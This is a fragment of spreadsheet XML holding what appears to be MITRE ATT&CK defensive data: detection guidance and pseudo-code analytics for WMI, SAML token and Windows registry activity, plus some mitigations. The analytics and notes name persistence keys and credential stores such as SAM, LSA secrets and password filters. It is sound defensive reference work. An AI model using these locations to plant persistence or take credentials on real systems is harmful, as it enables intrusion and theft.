  <si>
    <t>x-mitre-data-component--d46272ce-a0fe-4256-855e-738de7bb63ee</t>
  </si>
  <si>
    <t>Monitor cluster-level (Kubernetes) data and events associated with changing containers' volume configurations.</t>
  </si>
  <si>
    <t>relationship--754012c4-1e1e-4e68-93c0-b2b5d0ce6cf2</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</si>
  <si>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</si>
  <si>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relationship--2df6acb7-87cc-49be-9cd6-6adbdfdd773f</t>
  </si>
  <si>
    <t>WMI Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--05645013-2fed-4066-8bdc-626b2e201dd4</t>
  </si>
  <si>
    <t>Monitor for newly constructed WMI Objects that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.</t>
  </si>
  <si>
    <t>relationship--335b3a8b-5e78-4a3a-82ac-eff51172ae81</t>
  </si>
  <si>
    <t>attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939</t>
  </si>
  <si>
    <t>Monitor for the creation of WMI Objects and values that may highlight storage of malicious data such as commands or payloads.</t>
  </si>
  <si>
    <t>relationship--614aa853-04f5-40eb-a504-773a3a32d045</t>
  </si>
  <si>
    <t>24 March 2023</t>
  </si>
  <si>
    <t>relationship--1685ad32-a34b-4ecc-83b0-f55d53c9b2aa</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed WMI objects that is often used to log into a service that accepts remote connects.  </t>
  </si>
  <si>
    <t>relationship--a1bf0891-8780-487a-b6f0-55af6520cc8e</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed WMI objects that will execute malicious commands and payloads. </t>
  </si>
  <si>
    <t>relationship--d651a54f-41a3-49cc-860e-5542b2df86af</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</si>
  <si>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</si>
  <si>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relationship--dede2215-e875-427c-a42e-794449c0f5c8</t>
  </si>
  <si>
    <t>Web Credential Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--5f7c9def-0ddf-423b-b1f8-fb2ddeed0ce3</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</si>
  <si>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</si>
  <si>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relationship--0c2dff3a-5de1-4a39-aad4-5db273d9fcd7</t>
  </si>
  <si>
    <t>Monitor for creation of access tokens using SAML tokens which do not have corresponding 4769 and 1200 events in the domain.(Citation: Sygnia Golden SAML)</t>
  </si>
  <si>
    <t>relationship--05c94aaf-1db8-40ce-9ec2-8628f8e17e20</t>
  </si>
  <si>
    <t>Web Credential Usage</t>
  </si>
  <si>
    <t>x-mitre-data-component--ff93f688-d7a4-49cf-9c79-a14454da8428</t>
  </si>
  <si>
    <t>attack-pattern--f005e783-57d4-4837-88ad-dbe7faee1c51</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</si>
  <si>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</si>
  <si>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relationship--a8024b7c-3cc9-42d2-b6df-ad1762e2d29c</t>
  </si>
  <si>
    <t>Monitor for the use of Access Tokens to access services such as Email that were created using SAML tokens which do not have corresponding 1202 events in the domain.(Citation: Sygnia Golden SAML)</t>
  </si>
  <si>
    <t>relationship--05206466-cf74-44b7-a874-234c7bbf1818</t>
  </si>
  <si>
    <t>Monitor for the use of access tokens to access services such as email that were created using SAML tokens which do not have corresponding 1202 events (i.e. “The Federation Service validated a new credential”) in the domain.(Citation: Sygnia Golden SAML)</t>
  </si>
  <si>
    <t>relationship--012af60f-b7bc-4d71-bdf7-6b38a31e3a6f</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</si>
  <si>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</si>
  <si>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relationship--bd3cc937-04bc-4a6a-887e-0b0f28a15028</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</si>
  <si>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</si>
  <si>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relationship--d273b1b4-b263-4d9d-a02c-86f19c821dd6</t>
  </si>
  <si>
    <t>relationship--e21552ab-290f-4097-b7b6-8529c902a494</t>
  </si>
  <si>
    <t>Windows Registry Key Access</t>
  </si>
  <si>
    <t>x-mitre-data-component--ed0dd8aa-1677-4551-bb7d-8da767617e1b</t>
  </si>
  <si>
    <t>Monitor for unexpected windows registry key being accessed that may search the Registry on compromised systems for insecurely stored credentials.</t>
  </si>
  <si>
    <t>relationship--d6f3c818-929f-43d8-8888-fba25dff7b1c</t>
  </si>
  <si>
    <t>Monitor for attempts to access information stored in the Registry about devices and their associated drivers, such as values under `HKLM\SYSTEM\CurrentControlSet\Services` and `HKLM\SYSTEM\CurrentControlSet\HardwareProfiles`.(Citation: Microsoft Registry Drivers)</t>
  </si>
  <si>
    <t>relationship--bf3554a9-ddaa-4a36-8b21-179c9c77b0f0</t>
  </si>
  <si>
    <t>Monitor for the LSA secrets are stored in the registry at &lt;code&gt;HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets&lt;/code&gt; being accessed</t>
  </si>
  <si>
    <t>relationship--b31e4e2d-5ea7-4f2a-ba75-96973dab116f</t>
  </si>
  <si>
    <t>Monitor for the SAM registry key being accessed that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.</t>
  </si>
  <si>
    <t>relationship--aeceafe5-efd2-413d-aa85-5ad99f3951a9</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</si>
  <si>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&lt;h4&gt; Analytic 1 - Suspicious Registry&lt;/h4&gt;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t>
  </si>
  <si>
    <t>relationship--87d83969-9f72-40a7-bcf9-edd7561bb49b</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</si>
  <si>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</si>
  <si>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relationship--8047b029-b86a-497f-b246-8c54a3b24353</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</si>
  <si>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</si>
  <si>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relationship--d2065f08-57ba-4210-8863-24defbb63633</t>
  </si>
  <si>
    <t>Monitor for access to windows registry keys that may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.</t>
  </si>
  <si>
    <t>relationship--b57bbf55-ef91-4521-b988-2e3ea5e269d1</t>
  </si>
  <si>
    <t>relationship--c3792087-2552-4b05-8f7b-d1564f73dd5e</t>
  </si>
  <si>
    <t>Monitor for unexpected windows registry key being accessed that may search compromised systems to find and obtain insecurely stored credentials.</t>
  </si>
  <si>
    <t>relationship--04c0ec78-0bff-4d9e-8843-00589d0584ad</t>
  </si>
  <si>
    <t>Windows Registry Key Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--7f70fae7-a68d-4730-a83a-f260b9606129</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</si>
  <si>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</si>
  <si>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relationship--3015c5fe-c6da-4de5-a352-87a90722a975</t>
  </si>
  <si>
    <t>Audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)</t>
  </si>
  <si>
    <t>relationship--c87a4238-eaec-4df1-b8b4-3f69aded080a</t>
  </si>
  <si>
    <t>Monitor for additions of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry.</t>
  </si>
  <si>
    <t>relationship--68ac384d-a975-4ebe-8db3-5b4edf6d924d</t>
  </si>
  <si>
    <t>Monitor for newly constructed windows registry keys that may use scripts automatically executed at boot or logon initialization to establish persistence.</t>
  </si>
  <si>
    <t>relationship--16a0a1cd-707a-4fd4-bdeb-2dd1165aeec7</t>
  </si>
  <si>
    <t>Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.</t>
  </si>
  <si>
    <t>relationship--b242e5c2-d360-4705-b2c5-e856dd7c9e43</t>
  </si>
  <si>
    <t>Monitor for newly constructed windows registry keys that may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>relationship--c2b4c63c-4524-4058-82ef-c67c5d410291</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor the addition of the MiniNT registry key in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control, which may disable Event Viewer.(Citation: def_ev_win_event_logging)(Citation: disable_win_evt_logging) </t>
  </si>
  <si>
    <t>relationship--cb7b8743-0d0a-46a1-bab9-80f90e73d127</t>
  </si>
  <si>
    <t>Monitor for the creation of Registry values that may highlight storage of malicious data such as commands or payloads.</t>
  </si>
  <si>
    <t>relationship--4853b508-182b-4556-bc41-5d4daa2ff28d</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</si>
  <si>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</si>
  <si>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relationship--5c93f0f0-7e90-4c30-bcd8-850077a8a2f1</t>
  </si>
  <si>
    <t>Monitor for the creation/modification to Registry keys associated with Windows logon scrips, nameley &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.</t>
  </si>
  <si>
    <t>relationship--ebd9f76d-f007-4077-a0c0-7b319eeb3b40</t>
  </si>
  <si>
    <t>Monitor for the addition of network provider Registry keys (e.g., `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\&lt;NetworkProviderName&gt;\NetworkProvider`).</t>
  </si>
  <si>
    <t>relationship--4e7f5747-be2c-4906-9c0d-090545be613e</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Registry Edit with Creation of SafeDllSearchMode Key Set to 0&lt;/h4&gt;
&lt;code&gt;safe_dll_search_processes = filter processes where command_line CONTAINS("*SafeDllSearchMode*") AND ((command_line CONTAINS("*reg*") AND command_line CONTAINS("*add*") AND command_line CONTAINS("*/d*")) OR (command_line CONTAINS("*Set-ItemProperty*") AND command_line CONTAINS(*-value*)) OR ((command_line CONTAINS("*00000000*") AND command_line CONTAINS(*0*)))
reg_keys = search Registry:value_edit
safe_dll_reg_keys = filter reg_keys where value="SafeDllSearchMode" AND value_data="0"&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--a446142d-dd7a-428a-9a4b-5023bf637e52</t>
  </si>
  <si>
    <t>relationship--3b455b4a-5295-4ef0-9908-44468661718f</t>
  </si>
  <si>
    <t>relationship--e25eac99-e1a6-4545-9353-3a2118dcf275</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</si>
  <si>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</si>
  <si>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relationship--d9c2b891-e40d-4963-aef7-3b43b20f21c1</t>
  </si>
  <si>
    <t>Collect events related to Registry key creation for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)</t>
  </si>
  <si>
    <t>relationship--e8deba4b-b2a0-4767-b0ee-dcacd64095c7</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</si>
  <si>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</si>
  <si>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relationship--1851d77b-bfdc-4aad-93cb-2e17a187c956</t>
  </si>
  <si>
    <t>Monitor for newly created windows registry keys that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.</t>
  </si>
  <si>
    <t>relationship--db0657fe-7bfb-43bc-8565-976e448683c3</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</si>
  <si>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</si>
  <si>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relationship--0fc9f4b4-c465-46cf-815d-65023ae1d561</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed registry keys upon creation of new task. Deletion of values/keys in the registry may further indicate malicious activity.
Note: Sysmon event id 12 is used in the analytic
&lt;h4&gt;Analytic 1 : Suspicious Creations under Schedule Registry Key &lt;/h4&gt;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t>
  </si>
  <si>
    <t>relationship--02a1aa09-4505-4b05-a84c-61fae4f4d39d</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</si>
  <si>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</si>
  <si>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relationship--3a446d3e-092a-4681-a674-890e9f896e04</t>
  </si>
  <si>
    <t>Monitor for new constructed windows registry keys that may create or modify Windows services to repeatedly execute malicious payloads as part of persistence.
&lt;h4&gt; Analytic 1 : Creation of the HKLM\System\CurrentControlSet\Services Registry key &lt;/h4&gt;
&lt;code&gt; suspicious_processes = filter ProcessGuid, ProcessFilePath, RegistryKeyPath, UserName where
  event_id == "12" AND
  RegistryKeyPath LIKE '%HKLM\System\CurrentControlSet\Services\%' &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--acbf80e8-fd71-4944-aa7b-e0ce4b73dc8c</t>
  </si>
  <si>
    <t>Windows Registry Key Deletion</t>
  </si>
  <si>
    <t>x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor windows registry keys that may be deleted or alter generated artifacts associated with persistence on a host system. </t>
  </si>
  <si>
    <t>relationship--ab070af4-71a4-4d65-91fa-8aa4fed8983a</t>
  </si>
  <si>
    <t>Monitor for deletion of Windows Registry keys and/or values related to services and startup programs that correspond to security tools such as HKLM:\SOFTWARE\Microsoft\AMSI\Providers.</t>
  </si>
  <si>
    <t>relationship--db9253ca-17d2-4ef6-bb17-01fd0951d7b3</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of windows registry keys that that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.</t>
  </si>
  <si>
    <t>relationship--6c816b9e-ec4e-417d-9427-b03c271a0c1c</t>
  </si>
  <si>
    <t>Monitor windows registry keys that may be deleted or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.</t>
  </si>
  <si>
    <t>relationship--fef9cd6e-4235-4ee5-8b9a-8ddea4fd0444</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected deletion of windows registry keys to hide configuration information, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution. </t>
  </si>
  <si>
    <t>relationship--3da41636-b5e3-4c81-b7e6-8e536d83ce5a</t>
  </si>
  <si>
    <t>Windows Registry Key Modification</t>
  </si>
  <si>
    <t>x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170</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</si>
  <si>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</si>
  <si>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relationship--d53305c1-45c5-4a3c-9c9d-c5d324161402</t>
  </si>
  <si>
    <t>Monitor Registry keys within &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options&lt;/code&gt;.</t>
  </si>
  <si>
    <t>relationship--d9cb13e1-cb80-4194-8b08-0f672e2f89db</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</si>
  <si>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</si>
  <si>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relationship--7dc4f72f-c27b-4b7c-b380-23aa1162299a</t>
  </si>
  <si>
    <t>relationship--4cbb6696-8000-46b8-a35d-afb0a25865be</t>
  </si>
  <si>
    <t>Monitor HKLM\Software\Policies\Microsoft\Windows NT\DNSClient for changes to the "EnableMulticast" DWORD value. A value of "0" indicates LLMNR is disabled.</t>
  </si>
  <si>
    <t>relationship--76509eea-063a-4623-a5e4-25372b82992d</t>
  </si>
  <si>
    <t>Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc.</t>
  </si>
  <si>
    <t>relationship--90f1e66f-9187-44a8-85cb-dcc15ca24d31</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</si>
  <si>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&lt;h4&gt; Analytic 1 : AppInit DLLs &lt;/h4&gt;
&lt;code&gt; appinit_keys = filter registry_keys where ((event_id == "12" OR event_id == "13" event_id == "14") AND
  key = "*\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls\*" OR
  key = "*\SOFTWARE\\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls\*"")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--d51223ba-aebe-448e-8a61-7460d96c8dd8</t>
  </si>
  <si>
    <t>Monitor for changes to windows registry keys and/or values that may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.</t>
  </si>
  <si>
    <t>relationship--31d1ec86-7f70-48b7-b44f-c1403f5f2c19</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</si>
  <si>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</si>
  <si>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relationship--332b2dd0-28c8-443d-9183-b368f27bdd01</t>
  </si>
  <si>
    <t>Monitor for modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry.</t>
  </si>
  <si>
    <t>relationship--807442ed-6830-4dcf-b4ef-c3b7cb78b823</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</si>
  <si>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</si>
  <si>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relationship--052d9dcb-0aa1-4cb0-8055-95412a5b61c0</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</si>
  <si>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</si>
  <si>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relationship--853f490c-0509-41d5-b723-f14cdc4805d1</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</si>
  <si>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</si>
  <si>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relationship--8b6a4a0f-eb26-4cc0-ab69-b88244a25fee</t>
  </si>
  <si>
    <t>Monitor for changes to Registry keys (ex: &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default&lt;/code&gt;) and associated values that may be malicious attempts to conceal adversary network connection history.</t>
  </si>
  <si>
    <t>relationship--29d285b9-7787-4e42-927b-c45277cbeca8</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys or values that may delete or alter generated artifacts associated with persistence on a host system.</t>
  </si>
  <si>
    <t>relationship--6a571043-2fc3-4b88-8777-0273d50c2a66</t>
  </si>
  <si>
    <t>Consider monitoring for modifications made to Registry keys associated with code signing policies, such as &lt;code&gt;HKCU\Software\Policies\Microsoft\Windows NT\Driver Signing&lt;/code&gt;. Modifications to the code signing policy of a system are likely to be rare.</t>
  </si>
  <si>
    <t>relationship--60a61381-266d-446c-98d2-4acebfcd3c2a</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</si>
  <si>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Analytic 1 : Component Object Model Hijacking &lt;/h4&gt;
&lt;code&gt; clsid_keys = filter registry_keys where ((event_id == "12" OR event_id == "13" event_id == "14") AND
  key = "*\Software\Classes\CLSID\*")&lt;/code&gt;
</t>
  </si>
  <si>
    <t>relationship--e713d92b-4545-4123-8dab-4c35e27d77c1</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</si>
  <si>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</si>
  <si>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relationship--532acf80-0480-40ec-9a9b-72376d0ea075</t>
  </si>
  <si>
    <t>Monitor for changes to windows registry keys and/or values that may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>relationship--8457a95f-009b-4813-8574-a5ac5d841402</t>
  </si>
  <si>
    <t>Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.</t>
  </si>
  <si>
    <t>relationship--89173790-d49a-4ef4-8d14-0fcab9ad8164</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Disable Windows Event Logging&lt;/h4&gt;
&lt;code&gt;event_log_reg_keys = filter reg_keys where Key="*EventLog*" AND (value="Start" OR value="File" OR value="MaxSize")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--83665c9e-6fea-4666-a45e-929fa0906cea</t>
  </si>
  <si>
    <t>Monitor for changes made to windows Registry keys and/or values that adversaries might use to disable or modify System Firewall settings such as HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy.</t>
  </si>
  <si>
    <t>relationship--3e087d2f-6f33-426d-beb2-b57e69f63d42</t>
  </si>
  <si>
    <t>Monitor for changes made to Windows Registry keys and/or values related to services and startup programs that correspond to security tools such as HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender.</t>
  </si>
  <si>
    <t>relationship--88e72e23-0d97-47ce-92a9-61fa36344550</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys and/or values that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.</t>
  </si>
  <si>
    <t>relationship--918c753a-c0e7-4bca-9d97-87c02f1ddf08</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys and/or values that may use a hidden file system to conceal malicious activity from users and security tools.</t>
  </si>
  <si>
    <t>relationship--379f0bed-bd70-4321-804e-3234ba362cc3</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry key or values for unexpected modifications of the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList&lt;/code&gt; key.</t>
  </si>
  <si>
    <t>relationship--594c7de5-a022-44d9-873d-630929169a5d</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys and/or values that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>relationship--a9bbaae4-a641-4a15-8972-1a11eddff27d</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys and/or values that may execute their own malicious payloads by hijacking the way operating systems run programs.</t>
  </si>
  <si>
    <t>relationship--45f25329-8d43-4e17-bbd3-5a8f8f3d9669</t>
  </si>
  <si>
    <t>Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc.</t>
  </si>
  <si>
    <t>relationship--686d4ed4-4199-4517-b06f-0adad5ca4ae5</t>
  </si>
  <si>
    <t>Monitor Registry edits for modifications to services and startup programs that correspond to security tools.</t>
  </si>
  <si>
    <t>relationship--e99392ab-a2a4-4a41-ad3e-4ec136829733</t>
  </si>
  <si>
    <t>To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID}&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--9a7d5e03-80a0-4ff8-b693-48e11c72aef3</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys or values that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.</t>
  </si>
  <si>
    <t>relationship--f22dec38-256c-4f01-897e-bb6329530b60</t>
  </si>
  <si>
    <t>Monitor the registry for changes associated with system recovery features (ex: the creation of &lt;code&gt;HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage&lt;/code&gt;).</t>
  </si>
  <si>
    <t>relationship--3d960e5c-2bec-43d2-9c4a-e1810e083114</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys or values for unexpected modifications</t>
  </si>
  <si>
    <t>relationship--6441996e-3d6b-4df4-9efa-c68a97baf322</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</si>
  <si>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</si>
  <si>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relationship--55fe86ac-5f5a-4c6c-a2f9-cd425f18326e</t>
  </si>
  <si>
    <t>relationship--a1b3d8e0-7de9-47f8-b8b0-727a4ece3f8a</t>
  </si>
  <si>
    <t>relationship--dfeef37f-a2da-4e85-addb-2bace5fd2de5</t>
  </si>
  <si>
    <t>Monitor for changes to Registry entries associated with credential access that is stored in the process memory of the LSASS. For example, the adversary can modify the SAM and SYSTEM files.</t>
  </si>
  <si>
    <t>relationship--5a20bdc4-1cf0-4426-b10e-67de34c1aeb7</t>
  </si>
  <si>
    <t>relationship--3572609a-ee27-4366-a463-24daa46d3d54</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</si>
  <si>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</si>
  <si>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relationship--e962f10c-55ce-4e2e-9ed5-2e88d3c138e7</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</si>
  <si>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Registry Edit with Modification of Userinit, Shell or Notify&lt;/h4&gt;
&lt;code&gt;logon_reg_processes = filter processes where command_line CONTAINS("*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*") AND (command_line CONTAINS("*Userinit*") OR command_line CONTAINS("*Shell*") OR command_line CONTAINS("*Notify*")) AND (((command_line CONTAINS("*reg*") OR command_line CONTAINS("*add*") OR command_line CONTAINS("*/d*")) OR (command_line CONTAINS("*Set-ItemProperty*") OR command_line CONTAINS("*New-ItemProperty*") OR command_line CONTAINS("*-value*"))))
reg_keys = search Registry:value_edit
logon_reg_keys = filter reg_keys where (value="Userinit" OR value="Shell" OR value="Notify")&lt;/code&gt;
&lt;h4&gt;Analytic 2 -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</si>
  <si>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relationship--01dc8f01-b295-4b1f-b943-a347fdfebe95</t>
  </si>
  <si>
    <t>Monitor for changes to windows registry keys or values that may target multi-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources.</t>
  </si>
  <si>
    <t>relationship--e62777a8-ad93-4e5a-bb69-ccc708118e5e</t>
  </si>
  <si>
    <t>Monitor the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt; registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>relationship--3144ceab-e735-4370-bafd-93fd5cf02873</t>
  </si>
  <si>
    <t>Monitor for changes to Registry entries for network providers (e.g., `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order`) and correlate then investigate the DLL files these values reference.</t>
  </si>
  <si>
    <t>relationship--531e2785-0bbd-43f0-8784-ebe6808afa98</t>
  </si>
  <si>
    <t>relationship--73b72b8a-1271-419c-a903-10501749c689</t>
  </si>
  <si>
    <t>Collect events related to Registry key modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)</t>
  </si>
  <si>
    <t>relationship--4a636b51-f43a-4ae0-add4-59ba2edf679f</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</si>
  <si>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</si>
  <si>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relationship--95d7ffff-dcac-4f3c-9177-3c8158da71bc</t>
  </si>
  <si>
    <t>Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference.</t>
  </si>
  <si>
    <t>relationship--1dd3f4ff-93fe-4c10-8a0c-5afb8a2c03f4</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</si>
  <si>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</si>
  <si>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relationship--74a1161a-eff1-4112-90a1-f3c2f3f544bd</t>
  </si>
  <si>
    <t>Monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>relationship--1db4d8d3-a63c-4291-afc9-da0410d5c82a</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</si>
  <si>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</si>
  <si>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relationship--302fc02c-2b0a-4e00-b1a3-9059cd971c76</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</si>
  <si>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</si>
  <si>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relationship--e84df21f-b55f-4b5d-ae7b-0f8fcc4eed95</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</si>
  <si>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</si>
  <si>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relationship--36ec45da-4b51-4e71-9a77-64ddfe1c8b6f</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</si>
  <si>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</si>
  <si>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relationship--62f8bcc0-2a5c-4e2d-987e-0f82acae86d7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</si>
  <si>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</si>
  <si>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relationship--78f93749-8ffe-4d68-a594-fe8b9978b0dd</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</si>
  <si>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&lt;h4&gt; Analytic 1 : Registry Edit from Screensaver &lt;/h4&gt;
&lt;code&gt;scr_reg_events = filter processes where (
  event_id == "13" AND
  key="*\\Software\\Policies\\Microsoft\\Windows\\Control Panel\\Desktop\\SCRNSAVE.EXE" AND
  RegistryKeyValueData NOT IN ('PathToScreenSaverFile1','PathToScreenSaverFile2')) &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--e07051b0-e563-47bc-907e-67b488068d02</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</si>
  <si>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</si>
  <si>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relationship--d6c9a16c-b643-46ef-9168-0ef6d9e071c8</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys and/or values that may abuse the Windows service control manager to execute malicious commands or payloads.</t>
  </si>
  <si>
    <t>relationship--29761e14-daad-46fc-99ca-af8366e6a7b5</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys and/or values that may stop or disable services on a system to render those services unavailable to legitimate users.</t>
  </si>
  <si>
    <t>relationship--21c35f42-8d8f-4674-b57d-49398233f62b</t>
  </si>
  <si>
    <t>Monitor for modification of Registry keys and values used by services such as HKLM\SYSTEM\CurrentControlSet\Services that may allow adversaries to launch their own code when a service starts.</t>
  </si>
  <si>
    <t>relationship--19614400-1cbc-43ab-a0c1-fdba19d4edff</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</si>
  <si>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</si>
  <si>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relationship--f9d59358-17e0-44fe-8d59-fd534c9afc6b</t>
  </si>
  <si>
    <t>Monitor for changes made to Windows Registry keys and/or values that may forge credential materials that can be used to gain access to web applications or Internet services.</t>
  </si>
  <si>
    <t>relationship--44446a21-affe-4935-ba17-94e4cb521a25</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys and/or values that may abuse system services or daemons to execute commands or programs.</t>
  </si>
  <si>
    <t>relationship--1e9d1b0c-a3c2-4236-9814-e2f131afb87a</t>
  </si>
  <si>
    <t>Monitor for changes to Registry keys associated with &lt;code&gt;ServiceDll&lt;/code&gt; and other subkey values under &lt;code&gt;HKLM\System\CurrentControlSet\services\TermService\Parameters\&lt;/code&gt;.</t>
  </si>
  <si>
    <t>relationship--b67fd42d-2fc2-4df0-80b7-3e84ed8510ce</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys and/or values modifying W32Time information in the Registry.</t>
  </si>
  <si>
    <t>relationship--d74917d7-db59-4824-8e5c-7f97ae58f4a8</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</si>
  <si>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Analytic 1 : Modification of the HKLM\System\CurrentControlSet\Services Registry key&lt;/h4&gt;
&lt;code&gt; suspicious_registry = filter ProcessGuid, ProcessFilePath, RegistryKeyPath, UserName 
where
  (event_id == "13" event_id == "14") AND
  RegistryKeyPath LIKE '%HKLM\System\CurrentControlSet\Services\%'&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--1c3405bf-e044-470d-a69f-f6fa8028c2ee</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Modification of the Winlogon Registry Key&lt;/h4&gt;
&lt;code&gt;suspicious_processes = filter registry where event_id == "13" AND
  (RegistryKeyPath LIKE '%Userinit%' OR RegistryKeyPath LIKE '%Shell%' OR RegistryKeyPath LIKE '%Notify%') &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--e94afad2-4570-4f02-bad2-f0700027d719</t>
  </si>
  <si>
    <t>M1036</t>
  </si>
  <si>
    <t>Account Use Policies</t>
  </si>
  <si>
    <t>course-of-action--f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c</t>
  </si>
  <si>
    <t>mitigation</t>
  </si>
  <si>
    <t>mitigates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</si>
  <si>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</si>
  <si>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relationship--c1a6c86e-5d5d-4cf1-845e-1660d9c19baf</t>
  </si>
  <si>
    <t>13 June 2019</t>
  </si>
  <si>
    <t>Use conditional access policies to block logins from non-compliant devices or from outside defined organization IP ranges.(Citation: Microsoft Common Conditional Access Policies)</t>
  </si>
  <si>
    <t>relationship--b93fd13f-b11b-4f4b-9d77-977e7af41d5c</t>
  </si>
  <si>
    <t>relationship--4b7e0525-1ba7-4d55-89d1-07fc94193065</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</si>
  <si>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</si>
  <si>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relationship--a09cb233-bdff-4d89-bcc3-7fb2108911d0</t>
  </si>
  <si>
    <t>relationship--8f2d973c-aa06-42a1-9490-1e799c0a5ee2</t>
  </si>
  <si>
    <t>relationship--cff34686-cbdf-4e0b-8108-c2deaf8855a7</t>
  </si>
  <si>
    <t>relationship--f2d01f19-b4e7-417a-a936-11af9386b867</t>
  </si>
  <si>
    <t>M1015</t>
  </si>
  <si>
    <t>Active Directory Configuration</t>
  </si>
  <si>
    <t>course-of-action--e3388c78-2a8d-47c2-8422-c1398b324462</t>
  </si>
  <si>
    <t>Consider adding users to the "Protected Users" Active Directory security group. This can help limit the caching of users' plaintext credentials.(Citation: Microsoft Protected Users Security Group)</t>
  </si>
  <si>
    <t>relationship--6c1da818-6e35-4fa8-ad40-e45c2c90e016</t>
  </si>
  <si>
    <t>29 May 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Disable legacy authentication, which does not support MFA, and require the use of modern authentication protocols instead. </t>
  </si>
  <si>
    <t>relationship--14039b88-3e1f-4d21-a0a0-968a15451db1</t>
  </si>
  <si>
    <t>22 February 2023</t>
  </si>
  <si>
